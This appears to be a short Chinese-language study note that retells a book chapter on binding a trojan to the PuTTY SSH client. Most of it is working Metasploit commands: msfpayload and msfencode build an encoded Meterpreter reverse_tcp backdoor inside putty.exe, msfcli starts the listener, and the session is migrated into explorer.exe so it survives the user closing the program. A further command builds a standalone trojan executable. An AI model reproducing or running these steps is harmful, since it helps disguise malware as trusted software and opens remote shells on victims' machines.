第七章第三小节,讲的是将木马绑定到putty.exe程序下。觉得蛮有趣,这里再重复下书上的步骤:
1)百度搜索,下载原版putty程序
2)在bt5下输入命令:msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=80 R | msfencode -t exe -x /root/Desktop/putty.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -c 5。这样就生成了一个名为putty_backdoor.exe的木马程序。
3)启动监听程序:msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=80 E
4)将木马程序复制到靶机上运行,这时攻击机上就是获得一个远程连接的meterpreter会话。
5)将木马线程迁移到进程explorer.exe上,命令为run migrate -n explorer.exe(或者是migrate <对应pid>)。
6)这样,即使用户关闭了这个木马程序,也不会断开后门的连接。
以下是我从网上搜索得到的步骤:
1)msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=80 X > Desktop/muma01.exe
(这个是将攻击代码包装成程序,上面2)的是将木马附在正常的程序上)